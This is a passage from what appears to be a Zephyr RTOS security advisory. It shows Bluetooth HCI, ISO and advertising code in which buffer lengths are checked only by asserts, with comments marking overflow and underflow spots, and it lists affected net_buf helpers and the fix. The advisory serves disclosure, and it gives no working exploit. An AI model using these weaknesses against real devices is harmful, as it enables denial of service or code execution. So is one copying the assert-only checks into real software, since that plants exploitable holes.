				offsetof(struct pdu\_adv\_adv\_ind, data); /\* VULN: integer underflow \*/
			memcpy(adv\->ad\_data\_backup.data, pdu\->adv\_ind.data,
			       adv\->ad\_data\_backup.len); /\* VULN: buffer overflow \*/
		}
	}
#endif /\* CONFIG\_BT\_CTLR\_AD\_DATA\_BACKUP \*/
...

Buffer overflows due to assert in /subsys/bluetooth/host/hci\_core.c:

#if defined(CONFIG\_BT\_CONN)
static void hci\_acl(struct net\_buf \*buf)
{
	struct bt\_hci\_acl\_hdr \*hdr;
	uint16\_t handle, len;
	struct bt\_conn \*conn;
	uint8\_t flags;

	LOG\_DBG("buf %p", buf);

	BT\_ASSERT(buf\->len >= sizeof(\*hdr)); /\* VULN: assert \*/

	hdr \= net\_buf\_pull\_mem(buf, sizeof(\*hdr)); /\* VULN: buffer overflow \*/
	len \= sys\_le16\_to\_cpu(hdr\->len);
	handle \= sys\_le16\_to\_cpu(hdr\->handle);
	flags \= bt\_acl\_flags(handle);
...

static void hci\_event(struct net\_buf \*buf)
{
	struct bt\_hci\_evt\_hdr \*hdr;

	BT\_ASSERT(buf\->len >= sizeof(\*hdr)); /\* VULN: assert \*/

	hdr \= net\_buf\_pull\_mem(buf, sizeof(\*hdr)); /\* VULN: buffer overflow \*/
	LOG\_DBG("event 0x%02x", hdr\->evt);
	BT\_ASSERT(bt\_hci\_evt\_get\_flags(hdr\->evt) & BT\_HCI\_EVT\_FLAG\_RECV); 

	handle\_event(hdr\->evt, buf, normal\_events, ARRAY\_SIZE(normal\_events));

	net\_buf\_unref(buf);
}
...

void hci\_event\_prio(struct net\_buf \*buf)
{
	struct net\_buf\_simple\_state state;
	struct bt\_hci\_evt\_hdr \*hdr;
	uint8\_t evt\_flags;

	net\_buf\_simple\_save(&buf\->b, &state);

	BT\_ASSERT(buf\->len >= sizeof(\*hdr)); /\* VULN: assert \*/

	hdr \= net\_buf\_pull\_mem(buf, sizeof(\*hdr)); /\* VULN: buffer overflow \*/
	evt\_flags \= bt\_hci\_evt\_get\_flags(hdr\->evt);
	BT\_ASSERT(evt\_flags & BT\_HCI\_EVT\_FLAG\_RECV\_PRIO);

	handle\_event(hdr\->evt, buf, prio\_events, ARRAY\_SIZE(prio\_events));

	if (evt\_flags & BT\_HCI\_EVT\_FLAG\_RECV) {
		net\_buf\_simple\_restore(&buf\->b, &state);
	} else {
		net\_buf\_unref(buf);
	}
}

Buffer overflow due to assert in /subsys/bluetooth/host/iso.c:

void hci\_iso(struct net\_buf \*buf)
{
	struct bt\_hci\_iso\_hdr \*hdr;
	uint16\_t handle, len;
	struct bt\_conn \*iso;
	uint8\_t flags;

	BT\_ISO\_DATA\_DBG("buf %p", buf);

	BT\_ASSERT(buf\->len >= sizeof(\*hdr)); /\* VULN: assert \*/

	hdr \= net\_buf\_pull\_mem(buf, sizeof(\*hdr)); /\* VULN: buffer overflow \*/
	len \= bt\_iso\_hdr\_len(sys\_le16\_to\_cpu(hdr\->len));
	handle \= sys\_le16\_to\_cpu(hdr\->handle);
	flags \= bt\_iso\_flags(handle);
...

In addition, the following helper functions in /subsys/net/buf\_simple.c use assertions to check input, which renders checks ineffective:

*   net\_buf\_simple\_add()
*   net\_buf\_simple\_remove\_mem()
*   net\_buf\_simple\_push()
*   net\_buf\_simple\_pull()
*   net\_buf\_simple\_pull\_mem()

**PoC**

I haven't tried to reproduce these potential vulnerabilities against a live install of the Zephyr OS.

**Impact**

If the unchecked input above is attacker-controlled and crosses a security boundary, the impact of buffer overflow vulnerabilities could range from denial of service to arbitrary code execution.

**Patches**

This has been fixed in:

*   main for 3.5: #63605

Note that the first item in this advisory, the one involving /subsys/bluetooth/controller/ll_sw/ull_adv.c, has not been addressed because the pdu length that is being asserted on has been set by the controller itself prior to the execution of this code, and so it is not coming from the outside world. Hence, an assertion is correct in that particular case.

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in zephyr
*   Email us at Zephyr-vulnerabilities

Tag

#dos